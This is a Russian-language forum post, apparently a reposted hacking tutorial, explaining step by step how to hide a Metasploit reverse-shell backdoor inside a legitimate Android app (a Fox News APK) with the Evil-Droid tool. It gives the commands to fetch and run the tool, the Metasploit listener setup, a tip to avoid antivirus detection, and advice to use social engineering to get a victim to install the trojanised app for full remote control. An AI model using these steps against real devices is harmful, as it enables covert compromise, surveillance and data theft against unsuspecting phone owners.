Взлом Android, часть 3: как внедрить бэкдор в APK-файл Android

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
152
Депозит
-8.95$
Добро пожаловать обратно, мои начинающие хакеры!

Мобильные устройства – смартфоны и планшеты – распространяются по всему миру, постепенно вытесняя настольные компьютеры и ноутбуки. Эти устройства, как правило, работают под управлением iOS или Android, причём Android составляет большую часть всех операционных систем мобильных устройств (82%). Учитывая рост рынка мобильных устройств и доминирование операционной системы Android, вполне логично, что взлом Android всё чаще становится передовой хакерской деятельностью. Поэтому мы, Hackers-Arise, будем уделять всё больше времени взлому Android и создавать обучающие материалы, чтобы подготовить вас к этому.

6a4a49_48f57d16fdb04bc69e5fb15fa220447b~mv2.jpg


Это третья статья из серии «Взлом Android», которой предшествовали «Создание лаборатории по взлому Android» и «Основы Android» . Настоятельно рекомендую вам ознакомиться с моей статьей «Основы Android» , прежде чем читать дальше.

Шаг №1 Загрузите и установите Evil Droid

Для внедрения бэкдора в APK-файл Android мы будем использовать Evil-Droid . Это скрипт на Python, разработанный Маскерано Бачиром, который генерирует фреймворк для создания и внедрения полезной нагрузки APK для проникновения на платформы Android.

Чтобы загрузить скрипт, вы можете скопировать его в свою систему, введя:

kali > git clone https://github.com/M4sc3r4n0/Evil-Droid

6a4a49_af737dd8c9774b1fbe5dc1bbcbe38171~mv2.png


Если вы получили сообщение об ошибке, указывающее на то, что некоторые зависимости Evil-Droid недоступны или устарели, вам может потребоваться обновить ваши пакеты до более новых версий.

kali > apt-get upgrade

Шаг №2: Предоставьте себе разрешение на выполнение


Следующий шаг, конечно же, — предоставить себе разрешение на выполнение этого скрипта. Для этого перейдите в каталог Evil-Droid и используйте команду chmod, чтобы предоставить себе разрешение на выполнение.

kali > cd Evil-Droid

kali > chmod 775 evil-droid


6a4a49_e3a7f1fa99724b07a7abc5db92aa7637~mv2.png


Шаг №3. Казнить злого дроида.

Далее запустим evil-droid. Evil-droid проверит наличие интернет-соединения и нескольких необходимых программ, включая Metasploit.

кали > ./evil-droid

6a4a49_8145c1de102644cb90c2167ee50cd173~mv2.png


Обратите внимание на предупреждение внизу, выделенное КРАСНЫМ цветом. НЕ загружайте APK-файл на VirusTotal.com, так как это приведёт к активации антивирусной сигнатуры разработчиками антивируса.

Шаг №4. Реализация фреймворка

Как только evil-droid успешно обнаружит все необходимые компоненты, вы получите сообщение, подобное приведенному ниже, с вопросом, хотите ли вы «Выполнить фреймворк и службы». Нажмите «Да».

6a4a49_10599657a0434b1da57a8a8a77a96308~mv2.png


Шаг №5 Выберите бэкдор

Вас встретит экран меню ниже. Вы можете выбрать любой бэкдор по номеру. В данном случае мы выбрали «Backdoor APK Original (NEW)».

6a4a49_6ef40588ca32410abc558f8a322db373~mv2.png


Шаг №6 Выберите IP и порт

Затем Evil-droid попросит вас настроить LHOST (для Metasploit) и отобразит ваш локальный IP-адрес и публичный IP-адрес.

6a4a49_ff3d4fdb0e8d4652a381d0811ab5059b~mv2.png


Затем вам будет предложено указать LPORT. Порт 4444 — это порт по умолчанию для Meterpreter от Metasploit и других полезных нагрузок.

6a4a49_b56aa74df3ac47aa950433047f2854e9~mv2.png


Шаг №7. Дайте имя своей полезной нагрузке

Затем Evil-droid попросит вас дать имя вашей полезной нагрузке. Я назвал её hackers-arise-app, но вы можете назвать её как угодно.

6a4a49_50ad772bc7de4d9f9bf45d4467b8aa25~mv2.png


Шаг №8: Выберите полезную нагрузку/прослушиватель

Теперь нам нужно выбрать полезную нагрузку. Evil-droid позволяет использовать любую полезную нагрузку Android из Metasploit, включая android/meterpreter/reverse_tcp . Просто нажмите на переключатель рядом с полезной нагрузкой, которую вы хотите встроить в APK.

6a4a49_77d138fe77824785b9c970469bcfedf4~mv2.png


Шаг №9 Загрузите APK и встройте бэкдор

Затем evil-droid предлагает нам указать APK-файл, в который мы хотим встроить бэкдор. Я скачал любимый Foxnews.apk для встраивания нашего бэкдора.

6a4a49_113aaea755554fb5a8862c454735c2a9~mv2.png


Шаг №10 Выберите Metasploit Multi-Handler для создания соединения

На следующем шаге нам нужно указать evil-droid, как мы будем подключаться к бэкдору. Выберите «Multi-Handler».

6a4a49_6762be34ce3d49acb07b61f2a8a421e4~mv2.png


Теперь нам нужно открыть многофункциональный обработчик в Metasploit, чтобы он мог «перехватить» соединение, возвращаемое от встроенной полезной нагрузки.

Откройте Metasploit, введя:

kali > msfconsole

Теперь нам нужно запустить многопользовательский обработчик и указать Metasploit, какой IP-адрес и порт прослушивать, а также какую полезную нагрузку прослушивать.

msf > использовать эксплойт/мульти/обработчик

msf > set PAYLOAD android/meterpreter/reverse_tcp

msf > SET LHOST 192.168.1.104

msf > установить LPORT 4444


6a4a49_46b7b427b6fd4978ab245f872dd25738~mv2.png


Шаг №11: Доставка APK получателю

На этом последнем этапе нам понадобится APK-файл (со встроенным бэкдором), который можно установить и запустить на целевом Android-устройстве. Здесь могут пригодиться навыки социальной инженерии. Вы можете отправить APK-файл по электронной почте, через DropBox или другой файлообменник. Если у вас есть физический доступ к устройству, вы можете просто установить его самостоятельно.

Когда целевой пользователь устанавливает приложение для просмотра «честных и сбалансированных» новостей FoxNews, оно запускает бэкдор и подключается обратно к вашей системе, предоставляя вам оболочку meterpreter на своем устройстве Android!

6a4a49_d15f49745ea84caf8764a4aa4378acc8~mv2.png


Из оболочки Meterpreter можно делать практически всё на устройстве Android. Список команд Meterpreter можно найти здесь.

Продолжайте в том же духе, мои начинающие хакеры, и мы вместе рассмотрим еще больше способов взлома Android-устройств!
 
Назад
Сверху Снизу